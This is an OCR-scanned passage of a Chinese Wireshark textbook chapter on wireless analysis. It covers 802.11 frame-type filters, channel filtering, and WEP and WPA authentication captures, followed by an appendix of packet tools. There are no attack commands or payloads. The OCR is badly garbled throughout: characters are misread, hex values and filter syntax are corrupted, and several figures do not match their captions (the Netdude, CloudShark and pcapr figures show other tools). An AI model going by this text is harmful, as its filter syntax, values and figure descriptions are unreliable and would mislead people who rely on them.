和 子 类 型 的 简要 参考 。 


表 13-1 无 线 类 型 /于 类 型 和 相关 过 洲 帮 语法 


帧 类 型 / 子 类 型 过 滤 艇 语法 





Association request wlan.fc.type_subtype = = Ox00 


Association response wlan.fc.type_subtype = = Ox01 


Reassociation request wlan.fc.type_subtype = = Ox02 











Reassociation response wlan.fc.type_subtype = = 0x03 
wlan.fc.type_subtype = = Ox04 
Probe response wlan.fc.type_subtype = = Ox05 
Beacon wlan.fc.type_subtype = = 0x08 
wlan.fc.type_subtype = = Ox0A 
Authentication wlan.fc.type_subtype = = Ox0B 
Deauthentication wlan.fc.type_subtype = = 0X0C 


Block ACK requests wlan.fc.type_subtype = = 0x18 


Block ACK wlan.fc.type_subtype = = Ox19 


Power save poll wlan.fc.type_subtype = = OX1A 


Request to send wlan.fc.type_subtype = = Ox1B 


Clear to send wlan.fc.type_subtype = = 0OX1C 


Contention free period end wlan.fc.type_subtype = = OX1E 
NULL data wlan.fc.type_subtype = = Ox24 


Null QoS data wlan.fc.type_subtype = = 0x2C 


13.7.3 ”人 沛 选 特定 频 深 





如 朵 你 在 全 看 来 日 多 个 信 媚 的 流量 ， 那 么 基于 信 壹 的 沛 选 束 非 瘦 有 
用 。 例 如 ， 如 果 你 本 来 只 期 竺 在 信道 1 和 6 出 现 流量 ， 那 么 可 以 输入 一 个 
过 滤 秀 显示 信 关 11 的 流量 。 如 末 及 现 有 流量 ， 那 么 你 束 知 道 一 定 征 哪里 
弄 错 了 一 -一 或 许 是 配置 钳 误 ， 或 许 有 钓鱼 无 线 设备 。 使 用 这 个 过 小 大 语 
法 ， 可 以 色 选 特定 频率 : 


wlan radio.channel == 11 


这 将 显示 信道 11 的 所 有 流量 。 你 可 以 将 2462 值 丛 换 成 想 注 选 的 信和 过 
对 应 的 频 座 。 表 13-2 列 出 了 信 违 和 频 京 的 对 应 表格 。 


表 13-2 ”802.11 无 线 信 道 和 频率 





频率 /MHz 








另外 还 有 数目 个 实用 的 无 线 网 络 流 量 过 滤器 ， 你 可 以 在 Wireshark 
wiki 上 查看 它们 。 


13.8 ”保存 无 线 分 析 配 置 


在 进行 无 线 数据 包 分 析 时 ， 预 配置 工作 很 麻烦 一 一 包括 添加 特定 的 
栏目， 编辑 过 小 规 设 置 。 为 了 避免 每 次 都 对 栏目 和 过 滤 希 进行 重新 配 
| 以 便于 在 有 线 和 无 线 分 析 配 普 之 间 
切换 。 


在 保存 配置 文件 之 前 ， 先 根据 需要 设置 栏目 和 过 滤 硕 。 之 后 ， 在 屏 
幕 右 下 角 的 当前 配置 列表 上 右 击 ， 并 单 击 New。 将 配置 文件 命名 
为 Wireless， 最 后 单 击 OK。 


13.9 ”无 线 网 络 安全 


部 著 和 管理 无 线 网 络 时 最 大 的 担忧 就 是 传输 数据 的 安全 性 。 数 据 在 
空气 中 改过， 任何 人 都 能 得 到 它 ， 因 此 数据 加 密 是 至 关 重 要 的 。 人 否则 ， 
任何 人 拿 天 Wireshark 和 AirPcap 束 都 能 看 到 数据 了 。 


| 注意 有 





当 使 用 其 他 层次 的 加 密 技术 时 ， 比 如 SSL 或 SSH， 通 信 仍 将 在 该 层 对 数据 进行 加 密 ， 别 
人 使 用 数据 包 咒 探 右 也 读 不 到 用 户 的 通信 内 容 。 





最 初 推荐 用 在 无 线 网 络 中 加 密 传 输 数 据 的 技术 依据 “有 线 等 效 加 
(Wired Equivalent Privacy, WEP) 标准 。WEP 在 前 几 年 很 成 功 ， 再 
Re 它 在 密 钥 党 理 方 面 的 几 个 漏洞 。 为 了 加 强 安 全 ， 儿 个 新 标 
准 叉 相继 被 设计 出 来 ， 包 括 无 线 上 网 保护 接 入 (Wi-Fi Protected 
Access，WPA) 和 WPA2 标 准 。 虽 然 WPA 和 更 安全 的 版 本 WPA2 仍 然 不 
可 徘 ， 但 一 般 认 为 它们 比 WEP 强 多 了 。 


在 这 一 节 ， 我 们 来 看 一 些 WEP 和 WPA 流 量 ， 以 及 认证 失败 的 例 
可 二 


13.9.1 ”成功 的 WEP 认 证 


80211-WEPauth. pcap 文 什 包 合 了 成 功 连接 WEP 无 线 网 络 的 例子 。 
个 网 络 使 用 WEP 安 全 机 制 。 你 必须 同 WAP 提 供 一 个 密码 ， 以 通 过 认证 
并 解密 它 发 来 的 数据 。 ph :人 码 当 成 无 线 网 络 密码 。 


如 图 13-11 所 示 ， 这 个 捕获 文件 以 数据 包 4 所 示 的 从 
WAP (00:11:88:6b:68:30〉 发 送 到 无 线 客户 站 〈00:14:a5:30:b0:af) 的 质 
询 开 始 辕 。 这 个 质询 的 目的 是 确认 无 线 客 户 疹 是 否 有 正确 的 WEP 窗 伍 。 
展开 802.11 头 部 和 tagged parameters， 你 可 以 看 到 这 个 质询 。 


翅 Wireshark . Packet 3 . 3e80211_wepauth 


Frame 3: 184 bytes on wire (1472 bits), 184 bytes captured (1472 bits) on interface 8 
Radiotap Header we8, Length 28 
882.11 radio information 
IEEE 862.11 Authentication, Flags: ........ 臣 
Type/Subtype: Authentication (8x888b) 
Frame Control Field: 人 xb009 
.888 8881 9811 1919 = Duration: 314 microseconds 
Receiver address: Apple 78:6c:9c (ac:cf:5c:78:6c:9c) 
Destination address: Apple 78:6c:9c (ac:cf:S5c:78:6c:9c) 
Transmitter address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
Source address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
BsS Id: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
688 = Fragment number: 6 
8888 8888 8188 .... = Sequence number: 4 
> Frame check sequence: Oxad79ad88 [correct] 
只 IEEE 882.11 wireless LAN management frame 
w Fixed parameters (6 bytes) 
Authentication Algorithm: Shared key (1) 
Authentication SEQ: 8x8882 
status code: Successful]l (Ox88808) 
Y Tagged parameters (138 bytes) 
Y Tag: Challenge text 各 
Tag Number: Challenge text (16) 
Tag length: 128 
Challenge Text: 97ebed97ca8a77fddae72796185d568958a64cadS5853e5d9... 





No.s 3 Timer OD.098458 * Source: Neiyea abr96:16 « Destination: Pole ?BBer.: Authentication * Type/subtype: Avuihenication * TypeSubtype: Avuihentica 


[coe |]| rep | 








图 13-11 WAP 给 无 线 客 户 端 发 送 质询 文本 


在 数据 包 5 中 ， 这 个 质询 被 确认 。 然 后 无 线 客户 端 将 用 WEP 密 人 码 角 
密 的 质询 文本 返回 给 WAP@Q， 如 图 13-12 所 示 。 


在 数据 包 7 中 ， 这 个 数据 包 航 再 次 确认 ， 并 且 WAP 在 数据 包 8 中 咖 
人 如 图 13-13 所 示 。 啊 应 里 包含 了 一 个 说 明 认 证 成 功 的 
通知 @， 


d 


-全 


二 Wireshark . Packet 4 . 3e80211_wepauth 


Frame 4: 283 bytes on wire (1624 bits), 283 bytes captured (1624 bits) on interface 8 

Radiotap Header v8, Length 28 

882.11 radio information 

IEEE 8682.11 Authentication, Flags: . 
Type/Subtype: Authentication (8x888b) 
Frame Control Field: @xb8468 
.060 8881 09011 1018 = Duration: 314 microseconds 
Receiver address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
Destination address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
Transmitter address: Apple 78:6c:9c (ac:cf:5c:78:6c:9c) 
Source addressy Apple 78:6c:9c (ac:cf:5c:78:6c:9c) 
BSS Id: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
so G000 = Fragment number: 9 
8608 8118 91606 .... = Sequence number: 109 

> Frame check sequence: 9xlafc56d8 [correct] 

> WEP parameters 

vw Data (147 bytes) 

0 Data: eB39cc718bf2dalc936cfe6a722fb8e7a8eee78529278d43... 

[Length: 147] 


No.: 4 " Time: SEE ADD F786c: KN " Destinaton: Neivear abr9r.: Authentation * Tpe/Sutype: Authentiation " Tpe/Subtype: Authenmtice 








图 13-12 ”无 线 客户 端 向 WAP 发 送 已 解密 的 质询 文本 


| Wireshark . Packet 3 . 3e80211_wepauth 





> Frame 5: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 8 
» Radiotap Header v8, Length 28 
” 882.11 radio information 
> IEEE 8362.11 Authentication, Flags: ........ C 
w IEEE 802.11 wireless LAN management frame 
w% Fixed parameters (6 bytes) 
Authentication Algorithm: Shared key (1) 
Authentication SEQ: GxB884 
Status code: Successful (868x8868) OO 








No,.: 5 " Time: OSI292 " Source’ Netrmear sbr96ri6 * Destinstion: Apple .entestion " Type/Subtype: Authentiestion " Type/Subtyper Authenticat 





图 13-13 “WAP 通知 客户 端 认证 成 功 了 


成 功 认证 后 ， 客 户 问 可 以 发 送 关 联 (association) 请 求 、 接 收 确认 
并 完成 连接 过 程 ， 如 图 13-14 所 示 。 








图 13-14 ”认证 过 程 后 又 跟 一 个 简单 的 双 数 据 包 关联 请 求 和 啊 应 


13.9.2 ”失败 的 WEP 认 证 


在 下 一 个 例子 中 ， 一 位 用 户 输入 他 的 WEP 密 码 连接 到 WAP， 几 秒 
后 ， 无 线 客户 病程 序 报告 无 法 连接 a 到 无 线 网 络 ， 但 没有 给 出 原因 。 捕 获 
的 文件 是 80211-WEPauthfail.pcap。 


与 成 功 连接 时 一 样 ， 通 信 从 WAP 在 数据 包 3 发 送 质 询 文 本 到 无 线 客 
户 端 开始 。 这 个 消息 被 成 功 确认 了 。 接 着 ， 在 数据 包 4 中 ， 无 线 客 户 端 
使 用 用 户 提 供 的 WEP 密 码 发 送 了 响应 。 

到 这 里 ， 我 们 会 想 ， 应 该 有 一 个 通知 告诉 我 们 认证 成 功 了 。 但 是 我 
们 在 数据 包 5 却 看 到 了 不 一 样 的 情况 ， 如 图 13-15 所 示 @，。 


P| Wireshark . Packet 3 . 3e80211_wepauthfail 





Frame 5: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 
> Radiotap Header v8, Length 28 
882.11 radio information 
IEEE 802.11 Authentication, Flags: ........ C 
v IEEE 8062.11 wireless LAN management frame 
v Fixed parameters (6 bytes) 
Authentication Algorithm: Shared key (1) 
Authentication SEQ: Ox8004 
各 status code: Authentication rejected because of challenge failure (9xBBof ) 








No.: 5 * Time: .O83918 " Sourre: Netmear abr6r16 * Destination: Apple Er [dBm -19 « Dats rate: 1 * Into: Authentication, SN=1, FN=0, Fiegs= 





图 13-15 ”这 个 消 明 告诉 我 们 认证 不 成 功 


这 个 消息 告诉 我 们 无 线 客 户 端 对 质询 文本 的 啊 应 不 正确 。 这 表明 客 
尸 问 用 以 解密 质询 文本 的 WEP 密 码 肯 定 输 错 了 。 结 果 ， 连 接 过 程 就 失败 
了 。 必 须 用 正确 的 WEP 密 码 重 试 才 行 。 


13.9.3 ”成 功 的 WPA 认 证 


WPA 使 用 了 与 WEP 完 全 不 同 的 认证 机 制 ， 但 它 仍然 依赖 于 用 户 在 
无 线 客户 端 输入 的 密码 来 连接 到 网 络 。80211-WPAauth.pcap 文 件 中 有 一 
个 成 功 的 WPA 认 证 的 例子 。 


该 文件 的 第 1 个 数据 包 是 WAP 发 送 的 beacon 广 播 。 我 们 展开 这 个 数 
据 包 的 802.11 头 部 ， 治 着 tagged parameters 往 下 看 ， 展 开 Vendor Specific 
标题 ， 如 图 13-16 所 示 ， 能 看 到 无 线 接 入 点 的 WPA@ 属 性 部 分 。 这 让 我 
们 了 解 到 WAP 文 持 的 WPA 版 本 与 实现 〈 如 果 有 的 话 ) 。 


无 线 客 户 疹 〈00:0f:b5:88:ac:82) 收 到 这 个 beacon 广 播 后 ， 驳 问 无 线 
接 入 点 (00:14:6c:7e:40:80) 发 送 一 个 探测 请 求 ， 并 得 到 了 啊 应 。 无 线 
客户 闫 和 无 线 接 入 点 在 数据 包 4 到 7 之 间 的 交互 ， 是 认证 与 关联 的 请 求 及 
吧 旋 。 


频 Wireshark . Packet 1 . 3e80211_wpaauth 


> Frame 1: 336 bytes on wire (2688 bits), 336 bytes captured (2688 bits) on interface 9 
Radiotap Header v8, Length 28 
882.11 radio information 
IEEE 892.11 Beacon frame, Flags: .,......， C 
IEEE 882.11 wireless LAN management frame 
” Fixed parameters (12 bytes) 
Y Tagged parameters (276 bytes) 
> Tag: SSID parameter set: DENVEROFFICE 
> Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6(B), 9, 12(B), 18, [Mbit/sec] 
> Tag: DS Parameter set: Current Channel: 1 
> Tag: Traffic Indication Map (TIM): DTIM 1 of 8 bitmap 
>» Tag: Country Information: Country Code US, Environment Any 
” Tag: ERP Information 
Tag: Vendor Specific: Microsof: WPA Information Element OO 
Tag Number: Vendor Specific (221) 
Tag length: 22 
QUI: 8980-58-f2 
Vendor Specific OUI Type: 1 
Type: WPA Information ELement (8x61) 
WPA Version: 1 
> Multicast Cipher Suite: 89-59-f2 TKIP 
Unicast Cipher Suite Count: 1 
>» Unicast Cipher Suite List 88-58-f2 TKIP 
Auth Key Management (AKM) Suite Count: 1 
> Auth Key Management (AKM) List 88-58-f2 PSK 
> Tag: Extended Supported Rates 24(B), 36, 48, 54, [Mbit/sec] 
” Tag: Vendor Specific: Microsof: WM/WME: Parameter Element 
> Tag: Vendor Specific: Epigram: HT Capabilities (882.11n D1.19) 
> Tag: HT Capabilities (882.11n D1.18) 
> Tag: Vendor Specific: Epigram: HT Additional Capabilities (882.11n D1.88) 
> Tag: HT Information (882.11n D1.18) 
; Tag: Vendor Specific: AtherosC: Advanced Capability 
> Tag: Vendor Specific: AtherosC: Unknown 
>» Tag: Vendor Specific: Microsof: WPS 








No.s 1 ' Time: 0.000000 " Source: Netmesr 3b:96r16 ' Destinstiom: Brosecast ' Pro... 1 ' Infe: Bescon fame. SN=568, FN=0. Flsgs= CG BI=100, SSID=DENVERC 





图 13-16 ”这 个 beacon 让 我 们 知道 无 线 接 入 点 支持 WPA 认 证 


现在 把 目光 转移 到 数据 包 8 上 。 这 是 WPA 开 始 握 手 的 地 方 ， 一 直 持 
续 到 数据 包 11。 这 个 握手 过 程 束 是 WPA 质 询 啊 应 的 过 程 ， 如 图 13-17 所 
人 外。 


Time Source Destination Protocol Length Channel Signal strength (dBm) Data rate Info 
8 8... Netgear ab:96:16 Apple 78:6c:9c EAPOL 157 -18 24 Key (Message 1 of 4) 


9 80... Apple 78:6c:9c Netgear ab:96:16 EAPOL 183 -42 1 Key (Message 2 of 4) 
19 8... Netgear ab:96:16 Apple 78:6c:9c EAPOL 181 -18 36 Key (Message 3 of 4) 
11 9..。 Apple 78:6c:9c Netgear ab:96:16 EAPOL 157 -42 1 Key (Message 4 of 4) 





图 13-17 这些 数据 包 是 WPA 握 手 的 一 部 分 


这 里 有 两 个 质询 与 啊 应 。 每 个 数据 包 都 可 在 基于 802.1x 
Authentication 头 部 下 的 Replay Counter 拭 找到 匹配 对 象 ， 如 图 13-18 所 
示 。 注 意 到 前 两 个 握手 数据 包 的 Replay Counter 值 是 1@， 而 后 两 个 握手 
数据 包 的 值 是 2@，。 


WPA 握 手 完 成 并 认证 成 功 后 ， 数 据 束 开始 在 无 线 客户 锋 和 和 WAP 之 
间 传 输 了 。 


前 Wireshark . Packet 8. 3e80211_ wpaauth DO 





Frame 8: 157 bytes on wire (1256 bits), 157 bytes captured (1256 bits) on interface @ 
Radiotap Header v8, Length 28 
” 882.11 radio information 
IEEE 502-11 Qo05 Data, Flags: -......F. 
Logical-Link Control 
8B2.1X Authentication 
Version: 882.1X-2884 (2) 
Type: Key (3) 
Length: 95 
key Descriptor Type: EAPOL WPA Key (254) 
> Key Information: Ox0889 
Key Length: 32 
Replay Counter: 1 
WPA Key Nonce: c@3d8f88f4d79265ea395378b28efc4ef67ba9f46b83eec7... 
Key IV: 
WPA Key RSC: 808800880000800880 
WPA Key ID 8000000000000000 
WPA Key MIC: 
WPA Key Data Length: 8 





,Tome’ 0.3770i0 " Source: Netvear abr96r16 " Destination: Hop FBr6cr. kT " Fional strength (dBm): -18 * Dats rate: 24 * Inio: Key (Nessage 1 ( 


Close | | Help 
Wireshark . Packet 10 . 3e80211_wpaauth 


Frame 19: 181 bytes on wire (1448 bits), 181 bytes captured (1448 bits) on interface 9 
> Radiotap Header v8, Length 28 
862.11 radio information 
IEEE 882.11 Qos Data, Flags: ..... 
>” Logical-Link Control 
8062.1X Authentication 
Version: 882.1X-2884 (2) 
Type: Key (3) 
Length: 119 
Key Descriptor Type: EAPOL WPA Key (254) 
Key Information: ©@x81c9 
Key Leneth: 32 
Replay Counter: 2 
WPA Key Nonce: c@3d8f88f4d79265ea395378b28efc4ef67ba9f46b83eec7... 
Key IV: 
WPA Key RSC: O080000800008008 
WPA Key ID 000000000000000 
WPA Key MIC: 6ad7ebeb26231a497c344a86e9ebf9c7 
WPA Key Data Length: 24 
》 WPA Key Data: ddl68856f281818806858f28281868886581f282816888568f282 





Ar 10 * Time: 0.380809 " Sourcer /Yetvear sbr95:16 * Destinationr Apmle 78r6c.h 1 * Signal strenoth [dBm -18 * Dats rate: 36 ' Inior Key (Message 31 


| 





图 13-18 ”Replay Counter 域 帮助 我 们 匹配 质询 和 啊 应 


13.9.4 失败 的 WPA 认 证 


与 WEP 一 样 ， 用 户 输 入 WPA 和 密码 后 ， 无 线 客 尸 闹 程 序 报告 无 法 连 
接 到 无 线 网 络 ， 但 没有 指出 问题 在 哪里 ， 我 们 来 看 一 看 友 生 了 什么 。 捕 
获 的 结果 保存 在 80211-WPAauthfail.pcap 文 件 中 。 


像 刚 才 成 功 的 WPA 认 证 那样 ， 捕 获 文 件 以 同样 的 方式 开始 。 这 包 
括 探测 、 认 证 和 关联 请 求 。WPA 握 手 从 数据 包 8 开 始 ， 但 在 这 个 例子 
中 ， 我 们 看 到 了 8 个 握手 数据 包 ， 而 不 是 之 前 在 成 功 认 证 环 市 中 看 到 的 4 


数据 包 8 和 9 表示 WPA 握 手 的 前 两 个 数据 包 。 然 而 在 这 个 例子 中 ， 
客户 端 发 送 回 WAP 的 质询 文本 有 误 。 结 果 ， 这 个 序列 在 数据 包 10 和 
11、12 和 13、14 和 15 中 多 次 重复 ， 如 图 13-19 所 示 。 使 用 Replay Counter 
可 以 配对 每 个 请 求 和 啊 应 。 


No. Time Source Destination Protocol Length Channel Signal strength (dBm) Datarate Info 
8 9.973773 Netgear ab:96:16 Apple 78:6c:9c EAPOL 157 
9 9.976519 Apple 78:6c:9c Netgear ab:96:16 EAPOL 183 
19 1.874298 Netgear ab:96:16 Apple 78:6c:9c EAPOL 1537 


-18 24 Key (Message 1 of 4) 
-301 Key (Message 2 of 4) 
-19 24 Key (Message 1 of 4) 
-32 .1 Key (Message 2 of 4) 
-18 36 Key (Message 1 of 4) 
-29 1 Key (Message 2 of 4) 
-18 48 Key (Message 1 of 4) 
-32 1 Key (Message 2 of 4) 


11 1.976573 Apple 78:6c:9c Netgear ab:96:16 EAPOL 183 
12 2.875292 Netgear ab:96:16 Apple _ 78:6c:9c EAPOL 157 
13 2.977619 Apple 78:6c:9c Netgear ab:96:16 EAPOL 183 
14 3.977211 Netgear ab:96:16 Apple 78:6c:9c EAPOL 157 
15 3.879537 Apple 78:6c:9c Netgear ab:96:16 EAPOL 183 





PPPphpPpPp pp bp 


图 13-19 这 里 的 额外 EAPOL 数 据 包 表明 WPA 认 证 失败 了 


握手 过 程 重 试 4 次 后 ， 通 信 中 止 了 。 如 图 13-20 所 示 ， 数 据 包 16 表 明 
无 线 客 户 疾 没有 通过 认证 种. 


二 Wireshark .Packet 16 .3e80211_wpaauthfail 





> Frame 16: 5@ bytes on wire (488 bits), 58 bytes captured (488 bits) on interface 8@ 
> Radiotap Header v8, Length 28 
> 882.11 radio information 
Y IEEE 802.11 Deauthentication, Flags: ........ C 
OO Type/sSubtype: Deauthentication 【9xBBBc1) 
> Frame Control Field: GOxceeg 
.888 8881 8811 1818 = Duration: 314 microseconds 
Receiver address: Apple 78:6c:9c (ac:cf:5c:78:6c:9c) 
Destination address: Apple 78:6c:9c (ac:cf:5c:78:6c:9c) 
Transmitter address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 
Source address: Netgear ab:96:16 (28:c6:8e:ab:96:16) 


BSS Id: Netgear ab:96;16 (28:c6:8e:ab:96:16) 
968698 = Fragment number: 种 
-。 = Sequence number: @ 
> Frame check sequence: @x69fd5288 [correct] 
Y IEEE 892.11 wireless LAN management frame 
v Fixed parameters (2 bytes) 
Reason code: Class 2 frame received from nonauthenticated STA (68x80686) 


No.’ 16 * Time: 2.0800348 * Sourcer Netgear abr96:i16 * Destination: Apme 78:. ml -17 * Dats rate: TI Desuthemtication, SN=0 FN=0. Flsgs= 


Ce re 





图 13-20 WPA 握手 失败 后 ， 客 户 问 认证 失败 


13.10 小结 


虽然 无 线 网 络 仍然 航 普 遇 认 为 是 不 安全 的 ， 但 筷 在 各 个 组 织 环 境 的 
部 昔 却 丝 坚 没有 减缓 。 随 痢 人 们 将 焦点 园 移 到 无 线 通 信 ， 竺 握 关 似 有 线 
网 络 那样 的 捕获 、 分 析 方法 ， 并 用 于 无 线 网 络 数据 和 包 变 得 尤为 重要 。 当 


然 ， 本 草 讲 授 的 概念 和 技巧 并 不 全 面 ， 但 它们 能 帮助 你 使 用 数据 包 分 本 
扩 术 解决 无 线 网 络 问题 ， 让 你 顾 在 起 跑 线 上 。 


附录 A ”延伸 阅读 





数据 包 分 析 工 具 不 只 有 Wireshark， 还 有 一 大 堆 趁 手 的 工具 ， 可 以 在 
解决 网 络 缓慢 、 网 络 安全 等 第 规 问题 及 分 析 无 线 网 络 问 题 时 大 显 威 力 。 
本 章 列 出 了 一 些 有 用 的 数据 包 分 析 工 具 ， 以 及 其 他 数据 包 分 析 的 学 习 资 


A.1 数据 包 分 析 工 具 


会 介绍 一 些 我 认为 最 有 用 的 。 


1. Tcpdump 和 Windump 

虽然 Wireshark 很 流行 ， 但 它 可 能 没有 Tcpdump 用 得 广泛 。 考 虑 到 一 
些 人 和 群 对 数据 包 捕 获 和 分 析 的 实际 需求 ，Tcpdump 十 完全 基于 文本 的 。 

虽然 Tcpdump 缺 少 图 形 特 性 ， 但 它 处 理 海量 数据 时 非 稼 靠 谐 。 因 为 
你 可 以 用 管道 将 它 的 输出 重 定 同 得 入 给 其 他 命令 ， 比 如 Linux 的 sed 和 
awk。 随 看 对 数据 包 分 析 的 深入 和 钻研， 你 会 发 现 Wireshark 和 Tcpdump 痢 
人 很 有 用 。 

Windump 只 是 Tcpdump 在 Windows 平 台 的 发 行 版 而 已 。 


2. Cain & Abel 


第 2 章 已 经 讨论 过 ，Cain & Abel 是 windows 平 台 上 最 好 的 ARP 绥 存 
下 Cain & Abel 实 际 上 是 一 个 非常 健壮 的 工具 坪 件 ， 你 
一 定 能 发 现 其 他 用 途 


3. Scapy 


I te py 简单 地 说 ， sah 灵活 的 数据 包 操 
纵 程序 。 


4. Netdude 


如 果 你 不 需要 像 Scapy 那 样 融 级 的 工具 ， 那 么 Netdude 是 Linux 下 的 
一 个 较 好 的 奉 代 品 。 虽 然 Netdude 功 能 有 限 ， Te 图 形 用 记分 
面 ， 因 而 出 于 研究 目的 ， 需 要 创建 、 修 改 数据 包 时 ， 它 显得 极其 方便 。 
图 A-1 演 示 了 使 用 Netdude 的 一 个 例子 。 


公 CloudShark Enterprise admin 


时 Anaysis Too ™ 四 Graphs + Downioad 次 Profie 


Source Destination Protocol | Length Info 


14.657298 fe80:;:cad7:19ff:fe4b:662a ff02::1 ICMPV6 Router Advertisement from c8:d7:19:4b:66:2a 
14.712675 fe80::cad7:19ff:fedb:662a ff02::16 ICMPv6 Multicast Listener Report Message v2 
3 ED 2 toab:662a ff02::16 ICMPV6 Multicast Listener Report Message v2 
ff02: 11:ffc3:alfb ICMPv6 Neighbor Solicitation for fe80: :821f:2ff:fec3:alfb 
"IOUZ20 ECy:alfb ff02::2 ICMPV6 Router Solicitation from 80:1f:02:c3:al:fb 
37.161462 0 1 031 dL ed ede £ff02::2 TCMPv6 Router Solicitation from 80:1f:02:c3:al:fb 
#1.162770 fe80::821f:2ff:fec3:alfb ff02::2 ICMPV6 Router Solicitation from 80:1f:02:c3:al:fb 
55.164537 feg80::821f:2ff:fec3:alfb ff02::2 TCMPVv6 Router Solicitation from 80:1f:02:c3:al:fb 
55.297940 fe80::cad7:19ff:fe4b:662a ££f02::1 ICMPvVv6 Router Advertisement from c8:d7:19:4b:66:2a 
55.302198 :: ff02: :1:ffc3:alfb TCMPVv6 Neighbor Solicitation for 300l:dddd: :821f:2ff:fec3:alfb 
55.507433 3001i:dddd::821f:2ff:fec3:alfb 300l:5la:cafe::]1 Source port: 11778 Destination port: commplex-link 
55.912451 192.168.1.1 224.0.0.1 Membership Query, general 
58.510548 300l:dddd: :821f:2ff:fec3:alfb 300l:Sla:cafe::1 Source port: 11779 Destination port: commplex~-link 
61.513551 3001:dddd::821f:2ff:fec3:alfb 300l:Sla:cafe::1 Source port: 11780 Destination port: commplex-link 





Frame 40: 78 bytes on wire (624 bits)，78 bytes captured (624 bits) 

Ethernet II, Src: EdimaxTe c3:;al:fb (80:1f:02:c3:al:fb), Dst: Ipv6mcast ff:c3:al:fb (33:33:ff:c3:al:fb) 
Internet Protocol Version 6, Srcecs: :+s (+1:), Dsts: ff02::+1:ffc3s:alfb (ff02::1:ffc3:alfb) 

Internet Control Message Protocol v6 


al fb 80 1f al fb 86 dd 
3a ££ 00 00 00 00 00 00 
00 00 ff£ 02 00 00 00 00 
al fb 87 00 00 00 00 00 





图 A-1 在 Netdude 上 修改 数据 包 


5. Colasoft Packet Builder 


如 果 你 是 Windows 有 用户， 并且 和 想 要 与 Ne GUI， 那 么 你 可 
以 考虑 使 用 Colasoft Packet Builder， 一 蒜 超 棱 的 倪 费 工具 。Colasoft 还 ee 
供 了 一 个 简便 的 用 于 数据 包 创建 和 修改 的 GUI。 


6. CloudShark 


CloudShark (由 QA Café 开 友 ) 是 我 很 喜爱 的 一 个 工具 ， 可 以 用 它 
企 线 分 享 数据 包 捕 获 记 录 。 如 图 A-2 所 示 ，CloudShark 网 站 可 以 在 浏览 
妖 里 以 Wireshark 的 方式 显示 网 络 捕获 文件 。 你 可 以 上 传 捕获 文件 ， 并 将 
链接 发 送 给 同事 ， 以 便 共 同 分 析 。 


File Tools Help 


一 Select anetwork adapterin the list 一 | 有 Siar 国 Stop 


区 二 二 Case Panel 
Hosts Files rn Images (33) Messages Credentials (2) Sessions (113) DNS (271) Parameters (1199) Filename MD5 








tog.... tez.: 
fiter keyword: | v| 口 Case sansitiv ExactPhrase ~ Cear | Apply snotlog.... 4301c2 








D. port Protocol Filename ension Size Details A 
TCP 53130 TlsCertificate nr-data .net.cer + 1203B TLS Certificate: C 
TCP 53130 TlsCertificate GeoTrust SSL CA - G2.cer C 1117B TLS Certficate:C 
TCP 53130 TlsCertificate Geo Trust Global CA.cer C 897B TLS Certificate:C 
TCP 53138 HttpGetNormal index.html[2].ocspTesponse 0 sponse 1455B gb.symcd.com/ 
TCP 53139 HttpGetChunked index.html m 86958B www.meestup.cor 
TCP 53142 HttpGetNomal almond.minjsjavascript iavascni 2758B static2meetupsta 
TCP 53140 HttpGetNormal meetup_jquery_Ui.css 3 6725B static2.meetupsta 
TCP 53144 HttpGetNormal client min js javascript javascri 3692B static2meetupsta 
TCP 53145 HttpGetNormal infoWidget .min js javascript iavascni 20639B static2meetupsta 
TCP 53151 HttpGetNormal group Metadata min js javascript javascni 24093B saticlmeestupsta 
TCP 53149 HttpGetNomal mtiwoButtonCTA+testimonial.css 3 A445B static1.meetupsta 
TCP 53147 HttpGetNormal print .css Cs3 2171B static1meetupsta 
TCP 53141 HttpGetNormal meetup-nodem.css 3 223971B static2mestupsta 
TCP 53139 HttpGetNormal indexhtml.6D1A30C1.css 3 5582B www.meestup.com 
TCP 53146 HttpGetNormal whitney .css CS3 83455B static1.meetupsta 
TCP 53150 HttpGetNormal ghome.min js javascript jiavascni 102378B static1.meetupsta 
TCP 53148 HttpGetNormal chapterbase .css 3 165 101B static1meetupsta 
TCP 53143 HttpGetNormal Meetup.Base jquery min js javascript javascr 414355B static2meetupsta 
TCP 53152 HttpGetNormal thumb_156167702jpeg ipeg 2611B photos3meetupsl 
TCP 53156 HttpGetNormal thumb_151699612jpeg.PNG 2571B photos3meetupsi 














Tomm rn*ras lh 一 


< > 








Live Sniffing Buffer Usage: 





图 A-2 用 CloudShark 查 看 一 个 捕获 文件 示例 


天 于 CloudShark， 我 最 赞 贫 的 是 它 不 需要 注册 ， 并 月 DRIRL ES 
链接 获取 。 这 意味 着 ， 当 我 在 博客 上 发 布 一 个 PCAP 文 件 的 链接 时 ， 其 
他 人 只 需要 单 击 残 能 谷 看 数据 包 ， 而 不 需要 在 下 载 文件 后 ， 再 用 
Wireshark 打 开 。 


7. pcapr 


pcapr 是 Mu Dynamics 创 建 的 一 个 非常 健壮 的 用 于 分 于 PCAP 文 件 的 


Web 2.0 平 台 。 在 撰写 本 文 时 ，pcapr 包 含 了 将 近 3000 个 PCAP 文 件 ， 涉 及 
400 多 种 不 同 协 议 的 例子 。 图 A-3 显 示 了 pcapr 上 的 DHCP 尝 量 捕 区 的 例 
了 了。 


i@ 1. Python 
defender:CapTipper-master csanders$ sudo ./CapTipper.py ek_to_cryptowall4.pcapng 
CaqpTippen vB8.3 bl13 - MolLicious HTTP traffic expLorer tooL 

Copyright 2015 Omri Herscovici <omriher@gmail .com> 


[A] Analyzing PCAP: ek_to_cryptowall4.pcapng 


[+] Troffic Activity Time: Mon, 8@1/@4/16 16:25;54 
[+] Conversations Found: 


0; /index.php/Services -> text/html (Cservices) [16.2 KB] (Moagic; G2) 
‘C e-Someone-Vis -nonsense-tontLght-sweet-owait-gLganttic-dance-third -> text/html (Cquite-someone-visitor-non 
(Magic: 2) 
e-flash (bXJjkeHFLYXhmaA} [84.1 KB] (Magic: SWF》 
sque-forth-awaken-fountain -> text/html (earnest-fantastic-thorough-weave 


